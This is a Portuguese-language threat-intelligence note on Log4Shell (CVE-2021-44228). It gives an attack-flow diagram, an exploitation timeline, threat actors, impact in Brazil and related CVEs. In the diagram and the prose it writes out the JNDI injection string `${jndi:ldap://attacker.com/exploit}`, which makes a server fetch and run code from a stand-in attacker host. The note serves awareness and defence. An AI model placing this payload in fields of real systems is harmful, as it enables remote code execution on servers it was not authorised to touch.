# Log4Shell (CVE-2021-44228) - Zero-Day Universal (Dezembro 2021) > [!danger] CVSS 10.0 - A Vulnerabilidade do Século > Em 9 de dezembro de 2021, a divulgação pública do **Log4Shell** ([[cve-2021-44228|CVE-2021-44228]]) desencadeou a resposta de segurança mais ampla da história da internet: uma RCE sem autenticação em Log4j - biblioteca Java de logging presente em **bilhões de dispositivos** - com score CVSS 10.0. Dentro de 72 horas, mais de 100 grupos diferentes de atores iniciavam exploração ativa, incluindo APTs estatais, operadores de ransomware e mineradores de criptomoeda. --- ## Attack Flow ```mermaid graph TB A["🌐 Input Controlado pelo Atacante<br/>Header HTTP, campo de login<br/>parâmetro de URL, User-Agent"] --> B["📝 Log4j Processa Input<br/>Interpolação JNDI automática<br/>log.info() sem sanitização"] B --> C["🔍 JNDI Lookup<br/>${'{'}<jndi:ldap://attacker.com/a{'}'}<br/>Conexão externa disparada"] C --> D["☕ LDAP Server do Atacante<br/>Responde com classe Java<br/>maliciosa serializada"] D --> E["💥 RCE Imediata<br/>Classe Java carregada<br/>e executada no servidor"] E --> F["🐚 Reverse Shell / Webshell<br/>Acesso interativo<br/>ao servidor comprometido"] E --> G["⛏️ Cryptominer<br/>XMRig e variantes<br/>implantados em massa"] E --> H["🔐 Ransomware / Backdoor<br/>Conti, Khonsari, Orcus RAT<br/>implantados por APTs"] ``` --- ## Por que Log4j Estava em Tudo O Apache Log4j é uma **biblioteca de logging** open-source para Java - não um produto standalone, mas uma dependência incorporada em práticamente todo software Java enterprise. A vulnerabilidade estava presente em versões 2.0-beta9 a 2.14.1, abrangendo **anos de desenvolvimento**. A natureza ubíqua do Log4j significava que o problema não era "uma empresa vulnerável" - era toda a infraestrutura digital moderna simultâneamente. Entre os produtos afetados: **VMware vCenter, Apache Struts, Minecraft, Steam, Apple iCloud, Amazon AWS, Cisco, Juniper Networks, IBM WebSphere, Oracle Fusion Middleware**, e centenas de SaaS corporativos. O mecanismo de exploração era trivial: basta inserir `${jndi:ldap://attacker.com/exploit}` em qualquer campo que a aplicação logasse via Log4j. Isso incluía campos de username em login, cabeçalhos HTTP User-Agent, campos de pesquisa - qualquer input que chegasse ao servidor. --- ## Exploração em 72 Horas A velocidade da exploração foi sem precedentes na história das vulnerabilidades: | Tempo após divulgação | Evento | |----------------------|--------| | 0h | CVE-2021-44228 publicado no GitHub | | 2h | Primeiros scans em massa detectados (Cloudflare) | | 12h | PoC funcional disponível no Twitter | | 24h | Mais de 40.000 tentativas de exploração/hora (Check Point) | | 48h | APTs estatais (China, Iran, DPRK, Russia) identificados explorando | | 72h | 100+ grupos de ameaça distintos ativos | | 7 dias | Mais de 1,8 milhão de tentativas por hora no pico | A [[cisa]] emitiu **Emergency Directive 22-02** ordenando que todas as agências federais aplicassem patches em 48 horas - prazo extremamente apertado para vulnerabilidades em sistemas de produção. A diretora Jen Easterly chamou Log4Shell de "a more serious vulnerability than any I have seen in my career" - incluindo EternalBlue. --- ## Atores Identificados na Exploração | Ator | Objetivo | Região-alvo | |------|----------|-------------| | [[g0096-apt41]] (China) | Espionagem - acesso inicial | Global - governo e defesa | | [[g0125-silk-typhoon]] (China) | Espionagem persistente | EUA, Europe | | [[g0032-lazarus-group]] (DPRK) | Cryptojacking + espionagem | Global | | Phosphorus / APT35 (Iran) | Ransomware + espionagem | Israel, EUA | | Fancy Bear / [[g0007-apt28]] (Russia) | Reconhecimento | OTAN, governo | | Conti RaaS | Ransomware | Financeiro, saúde | | Grupos de cryptojacking | Mineração XMR | Servidores cloud | --- ## Impacto no Brasil e LATAM O Brasil foi significativamente afetado: o [[cert-br]] emitiu alerta crítico em 10 de dezembro e reportou varreduras ativas em infraestrutura nacional nas primeiras 24 horas. Bancos brasileiros - Bradesco, Itaú, Santander - iniciaram auditorias emergenciais de dependências. Órgãos federais com sistemas Java legados, incluindo plataformas do Serpro, foram objeto de inventário prioritário. A Febraban coordenou resposta setorial no setor financeiro, e o CTIR Gov emitiu alerta formal recomendando varredura imediata em todos os sistemas governamentais. A exploração ativa de Log4Shell no Brasil foi confirmada por múltiplas empresas de segurança, com foco em servidores de e-commerce e sistemas bancários. --- ## Log4Shell em 2026: Ainda Explorável Apesar do patch disponível desde dezembro de 2021, o Log4Shell **continua sendo explorado ativamente em 2026**. Razões: 1. **Shadow IT**: aplicações internas desconhecidas pelo time de segurança 2. **Dependências transitivas**: Log4j incorporado em bibliotecas de terceiros não inventariadas 3. **Sistemas legados**: aplicações críticas sem path de atualização 4. **Containers abandonados**: imagens Docker não atualizadas em produção A CISA mantém Log4Shell no KEV (Known Exploited Vulnerabilities) catalog com data de remediação indefinida - reconhecendo que a exposição é práticamente permanente em escala global. --- ## Variantes e CVEs Relacionados | CVE | Descrição | CVSS | |-----|-----------|------| | [[cve-2021-44228\|CVE-2021-44228]] | Log4Shell - JNDI RCE | 10.0 | | [[cve-2021-45046\|CVE-2021-45046]] | Log4Shell v2 - bypass do patch inicial | 9.0 | | [[cve-2021-45105\|CVE-2021-45105]] | DoS via recursive lookup | 7.5 | | [[cve-2021-44832\|CVE-2021-44832]] | RCE via JDBC appender | 6.6 | --- ## Referências CTI | Elemento | Ligação | |----------|---------| | CVE principal | [[cve-2021-44228\|CVE-2021-44228]] - CVSS 10.0 | | Threat Actors | [[g0096-apt41]], [[g0032-lazarus-group]], [[g0125-silk-typhoon]], [[g0007-apt28]] | | Técnica MITRE | [[T1190]] Exploit Public-Facing Application | | Técnica MITRE | [[T1059.007]] JS/JNDIExploit | | Nota detalhada | [[2021-12-log4shell-disclosure]] | | Evento antecessor | [[2021-05-colonial-pipeline]] | | Evento sucessor | [[2023-05-moveit]] | --- > [!info] Navegação - Eventos Relacionados > [[2021-05-colonial-pipeline]] | [[2023-05-moveit]] | [[cve-2021-44228|CVE-2021-44228]] | [[2021-12-log4shell-disclosure]] | [[_timeline]]